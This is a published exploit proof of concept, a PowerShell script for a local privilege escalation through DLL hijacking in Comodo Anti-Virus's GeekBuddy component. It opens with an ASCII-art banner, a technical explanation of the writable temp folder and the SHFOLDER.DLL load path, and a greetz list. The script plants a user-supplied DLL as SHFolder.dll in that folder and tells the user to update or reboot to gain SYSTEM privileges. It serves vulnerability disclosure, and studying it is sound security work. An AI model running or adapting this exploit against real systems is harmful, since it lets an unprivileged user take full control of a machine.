SHFolder.DLL Comodo AV Local Privilege Elevation Exploit

1. <#
2.  
3.  
4.                                                    ````......````                                                            
5.                                               ``,;''''''''''''''''';,`                                                        
6.                                            .;''''''''''''''''''''''''''',`                                                    
7.                                        `:''''''''+';:,.``````.,:;'''''''''':`                                                
8.                                      ,;'''''';,.`                  ``,;'''''';:                                              
9.                                   `:'''''',.                            `,'''''';.                                            
10.                                 `;+''+':`                  ,;              `,''''';.                                          
11.                               `;'''';.             ``    .:;'` `.             `;'''''.                                        
12.                           `  :+''';`          `,``:+''   ';;'`,'';  ``   ``      :'''';`                                      
13.                            .'''';`           ,';' '':'`  ';,'`'',' :''' .''`       :'''',                                    
14.                          `;''''`         ;'' :+.` ;';,   ';:' ''''`,;:+ '',         `;''''`                                  
15.                         .''''.     ;:`, .'.':`'''.:;`;.  +;:' '::; ;''' ';            .'''',                                  
16.                        :''';`   `  '''',`':'' ..;:`','`  '''' ':;;`'`';`':`   :;        :''';                                
17.                       ;''+,     .;`.'.'' ';.'`';': ,:. `  ` ` `,: .';',,'`;'.`';':       .+'''`                              
18.                     `''''`      ;'; ''.'.,','` ,`                  ``;`''  .`;'`''+:       ;'''`                              
19.                    `''''    .,  .'' ,'.'' ;;.         ````````         `.  ``'::'`;; `      :'''.                            
20.                  ``''':    `+,`  .':`'','        `,;''''''''''+'':.`        ;'.+:;'``':      .'''.                            
21.                  `''',      '',   ''`:;      `:'''''''''''''''''''''';.      `;'`': ''`'`     .''',                          
22.                 `''',   `   `''`  `';     .''''''''''''''''''''''''''''';`    `.;' ;'.''`.:    `''',                          
23.                `''',     :''.`''   `    ,;'''''''''''''''''''''''''''''''';. `  `,.'::', ''`    .'''.                        
24.                ''',      '.''`,':     ,'''''''''''''''''''''''''''''''''''''', `  .+,'; '';      .'''`                        
25.               ''':       ''`'' ;.   `'''''''''''''''''';:::;';'''''''''''''''''.    ;' :': ,,`    .'''                        
26.              :'';        `''.'`  ` :''''''''''''';:::.',   `''';`:;'+'''','''''+;    `,'; :'''     ,'''                      
27.             .'''     ``   .++;   `''''''''''''`.     `':    ''';    `:''' :'''''''.   .+ :''.+.     :'':                      
28.            `''+     :'':   ``   ,'''''''''''''       `':    ''';       `: ,'''''''':   .`''.''   `   '''`                    
29.            ;''.    `+.',;      ;'''':''''''''; `      ',  .'''':       `  :''''';''';   `'.',`,',    `+''                    
30.           ,'':      '';,'.    ;''''':''''''''`+`      ;..`;'+''.        '.:''''';'''''```.+'  +:'`    .'';                    
31.          `'''    `;``+',;.`  ;''''':''''''''.';      `;'',    '`        '' ;''''','''''`    ;,+.+.     ;''.                  
32.          ;'+.    :'': ;':   ;'''''':''''':',''.      `'';.+'  '`        ,'; .'''';''''''`  `+.':`      `'''                  
33.         `'':    .+`;''` `  ;'''''':''''''.::''.      .''.     ::        `'';`,'''':''''''`  :+'.        ,'',                  
34.         '''`    :''.:''   :''''''':'''''; :''''      .'',   `.,;     :+'`''': ;''','''''''   ,`          '''                  
35.        .'':      `'';``  ,''''''':;''''':`''';',     ,''+` ,+':'     +'''''''`,''''''''''';         .+`  .'':                
36.        '''    `''. :',  `''''''':`'''''+.;';.:::::::,,''';`'': .     .'''''''; ''''.''''''',    `  ;'':   '''                
37.       .'',    ','';`.   '''''''; :'''''' `,;'''''''''.```   .   ''''';:,`:;''+`'''',,'''''''`    :'';`    `+':                
38.       '''`    ''.,';   ;'''''';  ''''',`,'''''''''''''.....,,,.`''''''''';;,,;.''''; :'''''''   '''.       ;''                
39.      `'':     .'';:;  `'''''''` .+'', ,'''''''''''';  '''''''++`''''':..:'''' `'''''  ;'''''',  .,    ``   .'',              
40.    ` :''        :''`  ''''''+`  ;''``;'''''''''''''':``,,.`````,'''''.       ';.;'''` `'''''''`      .++.   '';              
41.      +''             ,'''''':   ;+`,'''''''''''''''''+''';;;;'''''''+`       :;+,`''. `.'''''';    .+'''`   :'+`              
42.     ,''.    ':       +''''';    ,,;''''''''''''''''''''''''''''''''''.  `.::,` `';.',   ;''''''`  :'':  `.  `'';              
43.     ;''    :;.;':   ,''''''.    `''''';;;,`.:'''''''''''''''''''''''''.;''''''':`;;;,   `''''''; `.;  .;'+`  ;''              
44.     '': `  ;';';'   '''''';     ''';;''''''',`.'',`   .:;;''''''''''.,'''''''''''.;;.    ,''''''   `;''''.   .''`            
45.    .''.    .';`;'  .''''''.    :+;;''''''''''': ;'    ::::...;''+'':,'''';..``;''';.      ''''''; `:''.`':   `'':            
46.    :''     `  ,'`  ;''''''.    :;'''''''''''''';`;,               `,''';` .:;;;'''':      ,''''''   .,''',    '''            
47.    ;';    ''';,`  `''''''''''` :''''''''''';.:'''`';:`            ,''';`;''''''''''',      ''''''.  ;';,`     :''`            
48.   `'',   .;,''';  ,'''''''''' ;'''''''''':`   :'''`::`          ``'''',+''''''''''''+`     ;''''';  .``.:;`   `''.            
49.   .''`   `+;'`;`  '''''''''';.'''''''',`       ''';`             :''';'''';::;'''''';;   ` `''''''`  ;'';;;   `+':            
50.   :''     ..;''  `''''''''''`'''''''',         .'''`            `+''';''.     ,'''''''''''''''''''''''''''''''''''''':`      
51.   ;''    :.  ``  .'''''''''';''''''''           ;'';            ;''':::`       :'''''''''''''''''''''''''''''''''''''''',    
52.   ;':    '''':`  :'''''''''''''''''',`          .'''            ''''.          `+'''''''''''''''''''''''''''''''''''''''''    
53.   '',    :,;'':  ;''''''''''''''''''`            ;''...        :''''`           :''''''''''''''''''''''''''''''''''''''''''`  
54.  `''.   `+'':,`  '''''''''''''''''';             ,'';.+`     . ,;'''            `'''''''''''''''''''''''''''''''''''''''''';  
55.  .''.   `.,;';   '''''''''';''''''',              ''',+. `` .'  .'''             ''''''''+'''''''''''''''''''''''''''''''''',
56.  .'+`   ;'''''          ``  '''''''`             `;''''.'++','`+.'''             '''''';                            `;+''''''
57.  ,''                        ''''';;               ,'''';'''';'``.'''             :''''''`                             .'''''':
58.  :'+                        '''''':               .'''';'''';'` .'''             ,''''''`                              ,''''';
59.  :''            ,''''',     ''''''`               .'''';'''';', .'''`            .''''''`                               ''''''
60.  ;''  `'''''';  :''''',     ''''''                .'''';'''';':,''''.            .''''''`                               ''''''
61.  ;''  `';'''''  :''''',     :'''';                :''''''''';''.'''''            `''''''`                               ;'''''
62.  ;''            :''''',     ,'''''               `+''''''''':''.'''''`           ,''''';                                ''''''
63.  :'+            ,''''',     `'''''.              ,'''''''''':''::'''';           ;''''':                               `''''''
64.  :''      ```.  ,''''':      ''''':             `''''''''''',''+`'''''.         `''''''.                               :''''''
65.  ,''` `'''''''  .''''';     `''''':             '''''''''''';''',,''''',        '''''''                               ,'''''',
66.  .''` `''':,.;  `''''''     `'''''':           '''''''''''''';'''`'''''':.   `,''''''',                             .''''''''
67.  `''`  `,;;;''`  ''''''     `'','''';,`     `,''''''''''''''',''':.''''''''''''''''''':`     ;'''''''''''''''''''''''''''''',
68.   '',   `+';;,   ''''''     `''`,'''''''''''''''''''''''''''':''''.:''''''''''''''''',+      '''''''''''''''''''''''''''''';  
69.   '':   `   `,.  ;'''''.    `''' .''''''''''''''''''''''''''''.''''`;''''''''''''''':;;     `''''''''''''''''''''''''''';';  
70.   ;';    ,'''';  :''''':    `''''``'''''''''''''''''''''''''''`:''''`;''''''''''''';,',     ,'''''''''''''''''''''''''''';    
71.   ;''    ';;,..  .''''''    `''';;  :''''''''''''''''';'''''''. '''''`;'''''''''''';+'`     ;'''''''''''''''''''''''''';.    
72.   :''   `,:;'''   ''''''`   `'''`';` `;'''''';,''''''';''''''', .'''''..''''''''''''+:      '''''''';''''''''';''''';,`      
73.   .''.   .''',`   ;''''': `  ''':;''.  ````` :+'''''',;''''''',  '''''';..;''''''''''`     `''''''    `,'':   `+':            
74.    '':    `  .;.  ,'''''+    .'';,'''''''';:''''''''','''''''':  ;'''''''''.`,'''''''      ;''''';  ,'',      .''.            
75.    '';     :+.++` `''''''.   +'''`'''''''''''''''''''.''''''''', .''';;'':,,'''''''',      ''''''.  ':''',    :''`            
76.    :''    ,';:.'.  ;''''''   ''''.:''''''''''''''''';;'''''''''''.'''.  `:;'''''':'':     :''''''   ';,.:'    '''            
77.    .''.   .;:'''   .''''''` ,'''':`''''''''''''''''':''''''''''';''''.`;'''''''''.'''',   '''''':   ,'''',   `'':            
78.     '';    ;';, ;`  '''''';.+''''' ''''''''''''''''':''''''''''': :'':'''''''''',;''''': :'''';'   ,. .;:    ,''`            
79.     ;''       `;', `,'''''''''''''.,'''''''''''''';','''';:.``   `,.;'''''''''''.+''''''.'''''';  ,'+'.      '''              
80.     .''.    '''';`   ''''';''''''';`'''''''''''''':.'';:,;'''':`  ,:`:''''''''','',`:''':''''''`  '.:'''    `'':              
81.      '''   :'': `:.  ,'''';;'''''''`;'''''''''''',:';`:'',,``.:'. `':`+''''''';:'',':';.'''''';  `'''..'    :''              
82.      :''`  `,. ;:++`  ''''';,'''''';`''''''''''';;',.''....,.. ,';:.'.`'''''''.'''','';+''''''  ;. ,+''`    '';              
83.      `'':    `'',`;:  `'''''',''''''.:''''''''''`+.,';:''''''';.:''':'`,''''''`'''':''''''''', :':;` ,'    ,'',              
84.       ;''`   `+.''+` ` :'''''','''''' '''''''''' `.'''''''''''''::'''', +'''':,''''`;''''''''  +.''+;      '''                
85.       `'':    ;'';` `   ''''''':''''';`'''''''',  '''''''''''''''.,''''`''''',:''''`,'''''''`  '''.:';    .'':                
86.        ''+`    ,`  ,+:  `'''''','''''':`'''''''` :''''''''''''';   ;'''`+''''`;'''':+''''''.` ` :'':;,    '''                
87.        .'':     ;';''.   .'''''';'''''',`'''''+  ''''''''''''''`  .,'';.''''' '''''''''''':   +'``;';    .'',                
88.         ''+`    :''; ,'`  :''''','''''''.,''''' ,''''''''''''''  :''''';''''','''';'''''';   ,.''. .``   '''                  
89.         `';;    `+. ;'':'  :''''':'''''''.:'''; ;''''''''''''': `'''''''''''.'''''.''''''   :';`'';     :''.                  
90.          :'',`    `'':.''`  ;'''';;:''''''`'''; '''''''''''''': .'''''''''''.''',;''''''   ` :''.'''`  `'''                  
91.           '''     ;'.:''`    ;''''';:''''':''';.'';''''''''''': ,'''''''''':;'':+''''''`  .''``'+',:   '''`                  
92.           .';;    `;;';   `   :''''':'''''';'''`'';''''''''''': ,''''''''''`''';''''';    .,''` :`    ,'':                    
93.            ;'',    `',   `'.   ,''''';''''';'''''':''''''''''': .''''''''',`+';,'''';    ``.''';    ``'''                    
94.             '''`        `'';: ` .'''':'''''`'''''';;''''''''''; `'''';'''',.`''+,'',   ,'`:'''''`    '''`                    
95.             .'''        ;'.''    `;''''''''.''''''':'''';:,''';. ,''';''''',;'''',`   `;''''''';.   ;'',                      
96.              ,'';      ''.;',      ,';''''';,''''''`+,`   .;:;''',,'';'''+.;''''',```:+,''''''''''.:'';                      
97.               ;'';    ''';',   '.   `,''''''.'''''' `.:;'+''''+''';.,.''':,''''''` ``'''''''''''''',''                        
98.                ''':   .,,':   :':    +''''''',''';.:'+,.`     `.:''':`''''''''''; `'':'''''''''''''',`                        
99.                 ''':     `   .''  `'`;'''''''..,.:+,`   ``.,.`    ,'''`;'''''''+.';'.:'''':;'''''+:.'`                        
100.                  ''':     ;:`+'`  ,:..,''''''; .+:   `:'+''''';`    ;'; .''''': `:';:+''';`''''''. .':                        
101.                  `''';    ; ;'.    .';'`;'''',;'.   .+''''''''''`    ;;'+:'''; .+'''''''';''''''.;,'';                        
102.                   `''''    ,';     :'`'`;'''':+`   `'''''''''''':     ;'';'''`;''''''''''''''''',.''';                        
103.                    `''''  ` `      `':. ';''.+.    `'''''''''''';     `'''''::'''.'''',`'''''': :';;''                        
104.                      ''''.        :;,'`:'.';',      '''''''''''':      ,'''','''..''': '''';;:,''. `''                        
105.                       :''':      `.+'' '''','       :''''''''''+.       ''''''':`'''' .''';:;`.'.:' ';                        
106.                        ,''''`      `,` ',;:'. `;;;,``'''::::;''; :';,   ,'''''' ;'''` +'''.''+'.:'+`':                        
107.                         `'''':      `  ;'':'  '''''+;.;  ``  ,:`''''',  `'''''`,'''' :'''.''''..''','.                        
108.                           :''''.        .,': :'''''''.`;'''';` .''''''`  '''':`+'''``''',;'''``''';:'.                        
109.                            `'''''`      `.'` ''''''';`'''''''': ,''''';  ;'''`''''; ''';:'''. ;''',''                        
110.                              ,'''''`    `.'` '''''''.'''''''''', +'''''` ,'';.''''`''''`+''' ,''''`.:                        
111.                                :''''',   .'  '''''''.'''';:.,'''`''''''. .''''''':.''',;'''``;,',' '.                        
112.                                 `:+'''';..;  '''''':,''':'''.:''.'''''': `'`''''' ''''`''': ' ::.:`+                          
113.                                   `,''''':'  ''''''::''+`''',;''.;''''', `'.'''';`'''.;'''`:.,+`'`,:                          
114.                                      .;+':'  '''''';.''''';`,'''.''''''` `'.''''.,'''`'''.`;`+;`' +                          
115.                                         .:+` '''''''`''''''+'''+.''''';  .' ;''' ;''.;,'' ' ''.:``:                          
116.                                           '. :'''''':.+'''''''',;''''',  ;: ;''; '''.'.,;,,:'' '`'                            
117.                                           ;; `'''''''``;'''''',`,'''''  `'` ''',.''',.:;`' ''.,.`;                            
118.                                           .+  ''''''' ` `.,,.`'; ''';   :; `''+`;'';;: :.;`',`; ;`                            
119.                                            +: `'''''``';;;;;'''', ``   `+. `''' '''::;;:;`;'`;..,                            
120.                                            ,'  ``.. `+''''''''''+`     :'  `'';`''':. ,.',''.; '                              
121.                                            `+'      :'''''''''''',    `+.`  '',.''',. :,''''+ ;                              
122.                                             .',     ;''''''''''''.    ':    ''.,''':` ;.''''.,.                              
123.                                              :'.    :''''''''''',    ;'`    ''.:''',':;.''':.:                                
124.                                               ''.     ,:''''',`     ;+`     :'.:'''' ':`''; ;                                
125.                                               `'',                 ''.       ::,''''``; :, '                                  
126.                                                 ;+;`             .'+`         ``'':'`,;   '``                                
127.                                                  ,'';.        `.'';`            :';'.,;  '.                                  
128.                                                   `,''';:::::;'''.                ``+;' +`                                    
129.                                                      `,:''''';,`                     ,,;                                      
130.  
131.  
132.  
133. SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
134.  
135. Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:
136.  
137. ###Technical Geeky Stuff###
138.  
139. GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
140. These binaries are individual components of the Comodo Security Suite and are executed whenever
141. their related function is performed, updated, or uninstalled.
142.  
143. The directory listing is as follows:
144. 10/06/2015  12:08 AM    <DIR>          .
145. 10/06/2015  12:08 AM    <DIR>          ..
146. 10/02/2015  10:43 PM                27 download.cfg
147. 10/02/2015  10:47 PM           637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
148. 10/02/2015  10:44 PM         2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
149. 10/02/2015  10:44 PM           547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
150. 10/06/2015  12:07 AM         1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
151. 10/02/2015  10:44 PM           554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
152. 10/06/2015  12:06 AM           950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
153. 10/06/2015  12:08 AM           563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
154. 10/02/2015  10:43 PM           768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
155. 10/06/2015  12:08 AM           581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
156. 10/02/2015  10:47 PM           459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
157. 10/02/2015  10:46 PM         1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
158. 10/06/2015  12:07 AM         1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
159. 10/06/2015  12:07 AM           648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
160. 10/02/2015  10:43 PM                 1 survey_version.txt
161. 10/06/2015  12:05 AM    <DIR>          updates
162.  
163. The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:
164.  
165. C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
166.                                 BUILTIN\Administrators:(OI)(CI)(ID)F
167.                                 CREATOR OWNER:(OI)(CI)(IO)(ID)F
168.                                 BUILTIN\Users:(OI)(CI)(ID)R
169.                                 BUILTIN\Users:(CI)(ID)(special access:)
170.                                                       FILE_WRITE_DATA
171.                                                       FILE_APPEND_DATA
172.                                                       FILE_WRITE_EA
173.                                                       FILE_WRITE_ATTRIBUTES
174.  
175. Notice how the folder allows Users to have FILE_WRITE_DATA and FILE_WRITE_EA access.  This allows
176. non-administrator users the ability to create files in the directory but not delete or modify
177. existing files.
178.  
179. Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
180. in the C:\Program Files (x86)\Common Files\COMODO\ folder.  This service is auto launched by the
181. registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher
182.  
183. This binary will then launch Unit_Manager.exe in the C:\Program Files\COMODO\GeekBuddy with SYSTEM
184. level privielges.  This binary in turn then launches the binary C:\Program Files\COMODO\GeekBuddy\unit.exe
185. to handle each sub process in the C:\ProgramData\Comodo\lps4\temp\ folder.
186.  
187. During client connections to update servers and Geek Buddy executions the unit.exe binary will
188. launch the binary setup_clps_client_transaction_release-4.19.365037.89.exe.  This setup binary has
189. hardcoded DLL loading procedures to look for SHFOLDER.DLL in the current directory which it is
190. executed from.
191.  
192. .data:00409240                 dd offset aShfolder     ; "SHFOLDER"
193. .data:00409244                 dd offset aShgetfolderpat ; "SHGetFolderPathA"
194.  
195. During this delay load procedure the exe will load SHFOLDER.DLL from its local directory before
196. looking in the other PATHS variables.
197.  
198. By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ and triggering an
199. update or client connection to secure servers (which occurs automatically at user login) a user can
200. elevate their privileges to SYSTEM and compromise the system fully.
201.  
202.  
203. ######### GREETZ ######################################################################################
204. 1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
205.  
206. @taviso - keep killing it and thanks for being an inspiration
207. @bill_billbil - sup girl chicken rico n chill
208. @tacticalRCE - Its no 100 mile rides but will miss all the good times.  C-ya around mang.
209. @hellNBak_ - drop tehm greetz like its 2003
210. @hacksforpancakes - make plans for other NullCon in 2016 ;)
211. @jduck - we gonna juke some more toyotas next time you come visit
212. @hdmoore - good luck with your ventures good sir
213. @jsoo - dont give up good sir - you're doing awesome
214. @thegrugq - when i grow up i hope im half as wise as you good sir
215. @daveaitel - Triangular Anus logos are the best
216. @da_667 - AYYYYYYYYYYYYYY LMAO
217. @bonovoxly - Clever Girls Wear Pink on Wednesdays
218. Derek Soeder - Respect to you brother, keep on being awesome
219. Benny 29A - next time im in CZ lets get beers, im buying
220. Yuji Ukai - #RESPECT to everything you have ever done and will ever do.  #Ninja
221. Sizzop - for fixing my greetz
222.  
223. #########################################################################################################
224.  
225.  
226. #>
227.  
228. Param
229. (
230.  
231.     [Parameter(ValueFromPipelineByPropertyName = $true)]
232.     [string]$DLL = ""
233. )
234.  
235.  
236.  
237.  
238. if (!(Test-Path $DLL))
239. {
240.     throw "Fatal Error: The specified file: $DLL does not exist."  
241. }
242.  
243. Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force
244.  
245. Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red
246.  
247.  
248. [void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
249.  
250. $objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
251.  
252.  
253. $MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
254. $objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
255. $objNotifyIcon.BalloonTipIcon = "Info"
256. $objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
257. Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges"
258. $objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
259.  
260. $objNotifyIcon.Visible = $True
261. $objNotifyIcon.ShowBalloonTip(8000)